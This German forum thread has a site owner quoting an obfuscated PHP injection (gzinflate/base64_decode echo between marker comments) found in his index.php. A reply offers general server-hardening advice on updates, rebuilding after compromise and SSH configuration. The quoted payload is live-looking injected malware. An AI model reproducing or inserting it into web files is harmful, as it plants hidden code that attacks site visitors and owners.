PHP Sicherheitslücken schließen (ALLE!)

[errox]

Hallo Liebe leute.

Irgendjemand hat es irgendwie geschafft das in meine index.php einzutragen:

#c3284d#

echo(gzinflate(base64_decode("lZExT8MwEIX/iuWltlSSsCZNpVKxIVjYEIMTn5OTHNuyL2kjyn8nUSsWYGC703uf7t7dLrURA+0nFdkYbc17olDmuXcWHdwpayFlDohXaIRwasJOkY/ZmCAeOnCUkX/yJ4hHlUDIDJ2G84sRfEgIXO7rQl4u/+EMRjD+fEXlx7qXqbVvx2GF2giK4NHC2okNmqgG2MjKZAnoQBSxGQkEP6Gmnm/5Pf+p9YBdT3+IKbZ8uxziF4VmCws1YcIGLdJcsh61Blex4BMSelcy1SRvF3/FLBgqWRGoYuTDtVoGfkfpgG450sP8qrrnJYngjdczl2/Fe6ZCAKePPVotjPzc5bdPfQE=")));

#/c3284d#

Die frage: WIE?!

Was gibt es alles für sicherheitslücken (Einige hab ich geschlossen, aber wie es aussieht nicht alle)

[Crash2001]

Da schaust du am besten mal hier nach.

Ist das ein Root oder V-Root-Server oder hast du nur den Webspace?

Was für ein Betriebssystem ist dies?

Welche Apache Version läuft?

Welche PHP-Version läuft?

Wurde es als Modul oder als CGI implementiert?

Sind sonst noch Module installiert?

WElche Sicherheitslücken hast du bereits geschlossen?

Mit den von dir bisher gelieferten Informationen kann dir wirklich niemand helfen. (Vor allem, da die Bugs doch sehr oft versionsabhängig sind.)

Ich gehe einfach mal von einem Root-Server oder V-Root-Server aus, denn ansonsten würdest du an der Absicherung von PHP ja eh nciht viel machen können.

Am besten du schaust erst einmal auf die Apache-Seite und installierst von dort die aktuellste stable Version und liest die Release Notes (dort steht oftmals schon etwas über Sicherheitslücken drin, bzw. wo du eine Liste findest).

Als nächsten Schritt einfach mal auf der PHP-Seite, installierst dir die aktuellste stable Version und schaust hier, was für Bugs es darin noch gibt und ob es entsprechende Bugfixes dafür gibt. Es gibt nun einmal nicht für alle Bugs auch automatisch Bugfixes, bzw. dies kann manchmal etwas dauern und in der Zwischenzeit soll man dann (falls möglich) bestimmte sicherheitsrelevante Funktionen ausschalten.

Dazu gibt es noch diverse HowTos (Distributionsabhängig!), wie man seinen Server generell absichert. Denn ob das überhaupt per PHP-Bug dort reingekommen ist, oder auf anderem Wege, wirst du sicherlich nicht wissen.

Wenn erst einmal jemand da war, heisst es eh erst einmal, das System (mit neuen Passwörtern und SSH-Keys) komplett neu aufsetzen und dann absichern...

Eine Absicherung ist z.B., dass man den Zugang des USers "root" nicht per SSH erlauben sollte, sondern sudo nutzen sollte (oder sich halt dann als su identifizieren und mit dem user dann arbeiten). Dazu noch den SSH-Port auf einen anderen Port (> 1024) legen. Ob man den Zugang nur per Zertifikat oder auch mit Username und passwort erlaubt ist dann noch die Frage. Hat beides seine Daseinsberechtigung in meinen Augen - sicherer ist es aber definitiv mit Zertifikat und auch nicht wirklich umständlicher, wenn man es eh nur von zu Hause oder vom Laptop oder Smartphone aus nutzen möchte.

Bearbeitet 9. Januar 2013 von Crash2001